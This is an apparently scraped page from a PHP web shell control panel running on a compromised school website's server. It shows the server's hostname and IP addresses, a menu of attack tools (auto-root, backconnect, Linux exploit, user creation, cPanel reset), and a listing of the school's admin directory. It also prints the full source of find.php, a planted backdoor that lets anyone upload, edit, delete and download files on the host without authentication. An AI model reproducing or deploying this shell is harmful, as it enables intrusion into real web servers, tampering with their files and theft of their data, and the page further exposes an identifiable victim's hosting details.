Linux srv540201.hstgr.cloud 4.18.0-553.33.1.el8_10.x86_64 #1 SMP Thu Dec 19 06:22:22 EST 2024 x86_64
LiteSpeed
: 194.238.17.211 | : 216.73.216.234
Cant Read [ /etc/named.conf ]
7.4.33
stcla6416
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
stclareschooldimapur.com /
public_html /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
vendors
[ DIR ]
drwxr-xr-x
activitycalendar.php
9.01
KB
-rw-r--r--
add10topper.php
7.01
KB
-rw-r--r--
add12topper.php
7.01
KB
-rw-r--r--
addaboutus.php
6.13
KB
-rw-r--r--
addaward.php
4.1
KB
-rw-r--r--
addbanner.php
5.38
KB
-rw-r--r--
adddetailmessage.php
6.19
KB
-rw-r--r--
addevent.php
7.61
KB
-rw-r--r--
addfacility.php
4.2
KB
-rw-r--r--
addfeesdata.php
8.46
KB
-rw-r--r--
addfeesheading.php
6.37
KB
-rw-r--r--
addgeninfo.php
5.12
KB
-rw-r--r--
addhistory.php
4.19
KB
-rw-r--r--
addintro.php
4.15
KB
-rw-r--r--
addmissionwithdrawal.php
9.05
KB
-rw-r--r--
addmoment.php
5.41
KB
-rw-r--r--
addnotice.php
6.29
KB
-rw-r--r--
addphotogallery.php
5.44
KB
-rw-r--r--
addphotos.php
4.89
KB
-rw-r--r--
addschoolinformation.php
4.26
KB
-rw-r--r--
addvision.php
4.19
KB
-rw-r--r--
admin.php
5.24
KB
-rw-r--r--
administration.php
8.99
KB
-rw-r--r--
assesment.php
8.94
KB
-rw-r--r--
booklist.php
8.93
KB
-rw-r--r--
cocurricular.php
9.01
KB
-rw-r--r--
contactlist.php
5.53
KB
-rw-r--r--
curriculum.php
9.36
KB
-rw-r--r--
dashboard.php
40.13
KB
-rw-r--r--
editfooter.php
18.56
KB
-rw-r--r--
examination.php
8.96
KB
-rw-r--r--
find.php
4.27
KB
-rw-r--r--
geninfo.php
5.03
KB
-rw-r--r--
index.php
31.9
KB
-rw-r--r--
list10topper.php
5.68
KB
-rw-r--r--
list12topper.php
5.68
KB
-rw-r--r--
listaboutus.php
5.36
KB
-rw-r--r--
listaward.php
5.23
KB
-rw-r--r--
listbanner.php
5.35
KB
-rw-r--r--
listdetailmessage.php
5.54
KB
-rw-r--r--
listevent.php
5.77
KB
-rw-r--r--
listfacility.php
5.25
KB
-rw-r--r--
listfeesdata.php
5.57
KB
-rw-r--r--
listfeesheading.php
5.37
KB
-rw-r--r--
listhistory.php
5.25
KB
-rw-r--r--
listintro.php
5.25
KB
-rw-r--r--
listmoment.php
5.36
KB
-rw-r--r--
listnotice.php
5.57
KB
-rw-r--r--
listphotogallery.php
5.4
KB
-rw-r--r--
listphotos.php
5.58
KB
-rw-r--r--
listschoolinformation.php
5.33
KB
-rw-r--r--
listvision.php
5.24
KB
-rw-r--r--
logout.php
302
B
-rw-r--r--
profile.php
9.74
KB
-rw-r--r--
rules.php
8.94
KB
-rw-r--r--
sportcorner.php
8.9
KB
-rw-r--r--
studenttcdetails.php
5.87
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : find.php
<?php @error_reporting(0); @ini_set('display_errors', 0); @ini_set('max_execution_time', 0); echo "<b>PHP:</b> " . php_uname() . "<br>"; // Affiche le système complet echo "<b>IP Server:</b> " . gethostbyname(gethostname()) . "<br>"; echo "<b>PHP Version:</b> " . phpversion() . "<br><br>"; $base_dir = '/home'; // Set the base directory here $current_dir = isset($_GET['dir']) ? realpath($_GET['dir']) : $base_dir; // Security check: Ensure current directory is within the base directory if (strpos($current_dir, realpath($base_dir)) !== 0) { die("Access denied!"); } // Handle file upload if (isset($_FILES['file'])) { $upload_file = $current_dir . DIRECTORY_SEPARATOR . basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $upload_file)) { echo "File uploaded successfully!"; } else { echo "File upload failed!"; } } // Handle file deletion if (isset($_GET['action']) && $_GET['action'] === 'delete' && isset($_GET['file'])) { $file = realpath($_GET['file']); if (strpos($file, $current_dir) === 0 && is_file($file) && is_writable($file)) { if (unlink($file)) { echo "File deleted successfully!"; } else { echo "Failed to delete file."; } } else { echo "Unable to delete file."; } } // Handle file download if (isset($_GET['action']) && $_GET['action'] === 'download' && isset($_GET['file'])) { $file = realpath($_GET['file']); if (strpos($file, $current_dir) === 0 && is_file($file) && is_readable($file)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file) . '"'); header('Content-Length: ' . filesize($file)); readfile($file); exit; } else { echo "Unable to download file."; } } // Handle file edit and save if (isset($_GET['action']) && $_GET['action'] === 'edit' && isset($_GET['file'])) { $file = realpath($_GET['file']); if (strpos($file, $current_dir) === 0 && is_file($file) && is_writable($file)) { if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['content'])) { file_put_contents($file, $_POST['content']); echo "File saved successfully!"; } // Display file content for editing $content = htmlspecialchars(file_get_contents($file)); echo "<h2>Editing file: " . htmlspecialchars(basename($file)) . "</h2>"; echo '<form method="post">'; echo '<textarea name="content" rows="20" cols="80">' . $content . '</textarea><br>'; echo '<input type="submit" value="Save Changes">'; echo '</form>'; echo '<a href="?dir=' . urlencode($current_dir) . '">Back</a>'; exit; } else { echo "Unable to edit file."; } } // Display current directory and navigation options echo "<h1>File Manager - " . htmlspecialchars($current_dir) . "</h1>"; echo '<a href="?dir=' . urlencode($base_dir) . '">Go to Home</a> | '; echo '<a href="?dir=' . urlencode(dirname($current_dir)) . '">Up</a><br><br>'; // File upload form echo '<form action="" method="post" enctype="multipart/form-data">'; echo 'Upload a file: <input type="file" name="file" required>'; echo '<input type="submit" value="Upload">'; echo '</form>'; // List directories and files $items = scandir($current_dir); echo "<ul>"; foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $path = $current_dir . DIRECTORY_SEPARATOR . $item; if (is_dir($path)) { echo '<li><a href="?dir=' . urlencode($path) . '">' . htmlspecialchars($item) . '</a> [Directory]</li>'; } elseif (is_file($path)) { echo '<li><a href="?action=view&file=' . urlencode($path) . '&dir=' . urlencode($current_dir) . '">' . htmlspecialchars($item) . '</a> [File] '; echo '| <a href="?action=delete&file=' . urlencode($path) . '&dir=' . urlencode($current_dir) . '" onclick="return confirm(\'Are you sure you want to delete this file?\');">Delete</a> '; echo '| <a href="?action=edit&file=' . urlencode($path) . '">Edit</a> '; echo '| <a href="?action=download&file=' . urlencode($path) . '">Download</a></li>'; } } echo "</ul>"; ?>
Close